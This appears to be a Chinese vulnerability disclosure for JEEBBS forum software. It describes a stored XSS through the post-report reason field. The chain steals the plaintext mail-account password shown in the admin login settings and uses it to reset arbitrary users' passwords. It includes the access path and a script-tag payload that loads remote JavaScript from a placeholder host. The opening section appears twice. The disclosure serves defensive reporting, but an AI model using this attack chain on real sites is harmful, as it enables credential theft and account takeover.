### 简要描述: JEEBBS 某些小问题可导致任意帐号密码重置。漏洞的类型,难度不重要,关键是能造成什么影响才是最重要的 ### 详细说明: 一、首先注册个帐号,虽然有些网站去掉了注册连接,但是register.jspx 文件还是存在的,直接访问可以注册帐号。 二、来到论坛的随便一个帖子里,找到举报的连接,虽然有些网站去掉了连接,但是通过 ``` member/getreportpage.jspx?url=/sqzx/帖子ID.jhtml ``` 去举报帖子。 三、由于举报的字符串没有经过过滤直接查询显示在后台位置,于维护->用户举报->举报详情->举报理由。形成存储型xss 四、由于每个论坛都需要设置邮箱帐号来方便论坛用户找回密码。在配置->登录设置 页面可以看到明文的帐号密码。 通过上面几点,可以往举报位置插入xss代码,通过js获取网站配置的邮箱的帐号密码,从而重置用户的帐号密码。 [<img src="https://images.seebug.org/upload/201411/20142616afd4da632a3747d89c9b94a0a2a579c8.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/20142616afd4da632a3747d89c9b94a0a2a579c8.jpg) [<img src="https://images.seebug.org/upload/201411/201426255551edf8b63e2b31f4141737a9355005.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/201426255551edf8b63e2b31f4141737a9355005.jpg) [<img src="https://images.seebug.org/upload/201411/20142634eb8e051fa429c9ead7e8be84e0a62214.jpg"...
### 简要描述: JEEBBS 某些小问题可导致任意帐号密码重置。漏洞的类型,难度不重要,关键是能造成什么影响才是最重要的 ### 详细说明: 一、首先注册个帐号,虽然有些网站去掉了注册连接,但是register.jspx 文件还是存在的,直接访问可以注册帐号。 二、来到论坛的随便一个帖子里,找到举报的连接,虽然有些网站去掉了连接,但是通过 ``` member/getreportpage.jspx?url=/sqzx/帖子ID.jhtml ``` 去举报帖子。 三、由于举报的字符串没有经过过滤直接查询显示在后台位置,于维护->用户举报->举报详情->举报理由。形成存储型xss 四、由于每个论坛都需要设置邮箱帐号来方便论坛用户找回密码。在配置->登录设置 页面可以看到明文的帐号密码。 通过上面几点,可以往举报位置插入xss代码,通过js获取网站配置的邮箱的帐号密码,从而重置用户的帐号密码。 [<img src="https://images.seebug.org/upload/201411/20142616afd4da632a3747d89c9b94a0a2a579c8.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/20142616afd4da632a3747d89c9b94a0a2a579c8.jpg) [<img src="https://images.seebug.org/upload/201411/201426255551edf8b63e2b31f4141737a9355005.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/201426255551edf8b63e2b31f4141737a9355005.jpg) [<img src="https://images.seebug.org/upload/201411/20142634eb8e051fa429c9ead7e8be84e0a62214.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/20142634eb8e051fa429c9ead7e8be84e0a62214.jpg) ### 漏洞证明: 评论的字符串有字符串长度限制,必须控制插入的代码的长度。插入 `<script src="http://xx.com.js"></script>` 例子证明影响到网站用户: [<img src="https://images.seebug.org/upload/201411/20143019f43700ba5d6c98ee0162cf66bf057236.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/20143019f43700ba5d6c98ee0162cf66bf057236.jpg) [<img src="https://images.seebug.org/upload/201411/201440151d52a390e58df86d42ff4bea759091df.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/201440151d52a390e58df86d42ff4bea759091df.jpg)